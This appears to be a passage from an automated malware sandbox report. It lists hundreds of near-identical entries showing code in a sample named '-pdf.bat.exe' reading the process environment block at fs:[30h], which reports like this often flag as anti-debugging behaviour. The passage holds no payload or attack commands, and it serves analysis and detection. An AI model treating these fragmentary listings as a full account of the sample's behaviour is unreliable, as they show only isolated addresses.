        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326282E0 mov eax, dword ptr fs:[00000030h]2_2_326282E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326282E0 mov eax, dword ptr fs:[00000030h]2_2_326282E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A2E0 mov eax, dword ptr fs:[00000030h]2_2_3262A2E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D2EC mov eax, dword ptr fs:[00000030h]2_2_3261D2EC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D2EC mov eax, dword ptr fs:[00000030h]2_2_3261D2EC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326302F9 mov eax, dword ptr fs:[00000030h]2_2_326302F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326432C5 mov eax, dword ptr fs:[00000030h]2_2_326432C5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F32C9 mov eax, dword ptr fs:[00000030h]2_2_326F32C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF2AE mov eax, dword ptr fs:[00000030h]2_2_326DF2AE
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E92AB mov eax, dword ptr fs:[00000030h]2_2_326E92AB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326192AF mov eax, dword ptr fs:[00000030h]2_2_326192AF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3261C2B0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB2BC mov eax, dword ptr fs:[00000030h]2_2_326FB2BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB2BC mov eax, dword ptr fs:[00000030h]2_2_326FB2BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB2BC mov eax, dword ptr fs:[00000030h]2_2_326FB2BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB2BC mov eax, dword ptr fs:[00000030h]2_2_326FB2BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E289 mov eax, dword ptr fs:[00000030h]2_2_3269E289
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627290 mov eax, dword ptr fs:[00000030h]2_2_32627290
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627290 mov eax, dword ptr fs:[00000030h]2_2_32627290
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627290 mov eax, dword ptr fs:[00000030h]2_2_32627290
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E363 mov eax, dword ptr fs:[00000030h]2_2_3265E363
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A0371 mov eax, dword ptr fs:[00000030h]2_2_326A0371
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A0371 mov eax, dword ptr fs:[00000030h]2_2_326A0371
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32618347 mov eax, dword ptr fs:[00000030h]2_2_32618347
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32618347 mov eax, dword ptr fs:[00000030h]2_2_32618347
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32618347 mov eax, dword ptr fs:[00000030h]2_2_32618347
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264332D mov eax, dword ptr fs:[00000030h]2_2_3264332D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E328 mov eax, dword ptr fs:[00000030h]2_2_3261E328
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E328 mov eax, dword ptr fs:[00000030h]2_2_3261E328
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E328 mov eax, dword ptr fs:[00000030h]2_2_3261E328
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3336 mov eax, dword ptr fs:[00000030h]2_2_326F3336
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32619303 mov eax, dword ptr fs:[00000030h]2_2_32619303
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32619303 mov eax, dword ptr fs:[00000030h]2_2_32619303
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF30A mov eax, dword ptr fs:[00000030h]2_2_326DF30A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263E310 mov eax, dword ptr fs:[00000030h]2_2_3263E310
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263E310 mov eax, dword ptr fs:[00000030h]2_2_3263E310
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263E310 mov eax, dword ptr fs:[00000030h]2_2_3263E310
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E3C0 mov eax, dword ptr fs:[00000030h]2_2_3261E3C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E3C0 mov eax, dword ptr fs:[00000030h]2_2_3261E3C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261E3C0 mov eax, dword ptr fs:[00000030h]2_2_3261E3C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261C3C7 mov eax, dword ptr fs:[00000030h]2_2_3261C3C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326263CB mov eax, dword ptr fs:[00000030h]2_2_326263CB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326533D0 mov eax, dword ptr fs:[00000030h]2_2_326533D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326543D0 mov ecx, dword ptr fs:[00000030h]2_2_326543D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A43D5 mov eax, dword ptr fs:[00000030h]2_2_326A43D5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326293A6 mov eax, dword ptr fs:[00000030h]2_2_326293A6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326293A6 mov eax, dword ptr fs:[00000030h]2_2_326293A6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621380 mov eax, dword ptr fs:[00000030h]2_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621380 mov eax, dword ptr fs:[00000030h]2_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621380 mov eax, dword ptr fs:[00000030h]2_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621380 mov eax, dword ptr fs:[00000030h]2_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621380 mov eax, dword ptr fs:[00000030h]2_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F380 mov eax, dword ptr fs:[00000030h]2_2_3263F380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264A390 mov eax, dword ptr fs:[00000030h]2_2_3264A390
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264A390 mov eax, dword ptr fs:[00000030h]2_2_3264A390
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264A390 mov eax, dword ptr fs:[00000030h]2_2_3264A390
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326C9060 mov eax, dword ptr fs:[00000030h]2_2_326C9060
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627072 mov eax, dword ptr fs:[00000030h]2_2_32627072
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32626074 mov eax, dword ptr fs:[00000030h]2_2_32626074
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32626074 mov eax, dword ptr fs:[00000030h]2_2_32626074
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650044 mov eax, dword ptr fs:[00000030h]2_2_32650044
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621051 mov eax, dword ptr fs:[00000030h]2_2_32621051
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621051 mov eax, dword ptr fs:[00000030h]2_2_32621051
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F505B mov eax, dword ptr fs:[00000030h]2_2_326F505B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D02D mov eax, dword ptr fs:[00000030h]2_2_3261D02D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32645004 mov eax, dword ptr fs:[00000030h]2_2_32645004
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32645004 mov ecx, dword ptr fs:[00000030h]2_2_32645004
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32628009 mov eax, dword ptr fs:[00000030h]2_2_32628009
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265D0F0 mov eax, dword ptr fs:[00000030h]2_2_3265D0F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3265D0F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261C0F6 mov eax, dword ptr fs:[00000030h]2_2_3261C0F6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326190F8 mov eax, dword ptr fs:[00000030h]2_2_326190F8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326190F8 mov eax, dword ptr fs:[00000030h]2_2_326190F8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326190F8 mov eax, dword ptr fs:[00000030h]2_2_326190F8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326190F8 mov eax, dword ptr fs:[00000030h]2_2_326190F8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B0D0 mov eax, dword ptr fs:[00000030h]2_2_3263B0D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B0D6 mov eax, dword ptr fs:[00000030h]2_2_3261B0D6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B0D6 mov eax, dword ptr fs:[00000030h]2_2_3261B0D6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B0D6 mov eax, dword ptr fs:[00000030h]2_2_3261B0D6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B0D6 mov eax, dword ptr fs:[00000030h]2_2_3261B0D6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DB0AF mov eax, dword ptr fs:[00000030h]2_2_326DB0AF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326600A5 mov eax, dword ptr fs:[00000030h]2_2_326600A5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F50B7 mov eax, dword ptr fs:[00000030h]2_2_326F50B7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261C090 mov eax, dword ptr fs:[00000030h]2_2_3261C090
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A093 mov ecx, dword ptr fs:[00000030h]2_2_3261A093
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32626179 mov eax, dword ptr fs:[00000030h]2_2_32626179
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F5149 mov eax, dword ptr fs:[00000030h]2_2_326F5149
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265415F mov eax, dword ptr fs:[00000030h]2_2_3265415F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657128 mov eax, dword ptr fs:[00000030h]2_2_32657128
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657128 mov eax, dword ptr fs:[00000030h]2_2_32657128
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF13E mov eax, dword ptr fs:[00000030h]2_2_326DF13E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262510D mov eax, dword ptr fs:[00000030h]2_2_3262510D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650118 mov eax, dword ptr fs:[00000030h]2_2_32650118
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326291E5 mov eax, dword ptr fs:[00000030h]2_2_326291E5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326291E5 mov eax, dword ptr fs:[00000030h]2_2_326291E5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326181EB mov eax, dword ptr fs:[00000030h]2_2_326181EB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326191F0 mov eax, dword ptr fs:[00000030h]2_2_326191F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326191F0 mov eax, dword ptr fs:[00000030h]2_2_326191F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F1F0 mov eax, dword ptr fs:[00000030h]2_2_3264F1F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F1F0 mov eax, dword ptr fs:[00000030h]2_2_3264F1F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301C0 mov eax, dword ptr fs:[00000030h]2_2_326301C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301C0 mov eax, dword ptr fs:[00000030h]2_2_326301C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E1A4 mov eax, dword ptr fs:[00000030h]2_2_3265E1A4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E1A4 mov eax, dword ptr fs:[00000030h]2_2_3265E1A4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F51B6 mov eax, dword ptr fs:[00000030h]2_2_326F51B6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326531BE mov eax, dword ptr fs:[00000030h]2_2_326531BE
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326531BE mov eax, dword ptr fs:[00000030h]2_2_326531BE
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov ecx, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov eax, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov eax, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32649194 mov eax, dword ptr fs:[00000030h]2_2_32649194
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661190 mov eax, dword ptr fs:[00000030h]2_2_32661190
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661190 mov eax, dword ptr fs:[00000030h]2_2_32661190
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov esi, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov eax, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov eax, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32620670 mov eax, dword ptr fs:[00000030h]2_2_32620670
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623640 mov eax, dword ptr fs:[00000030h]2_2_32623640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C640 mov eax, dword ptr fs:[00000030h]2_2_3265C640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C640 mov eax, dword ptr fs:[00000030h]2_2_3265C640
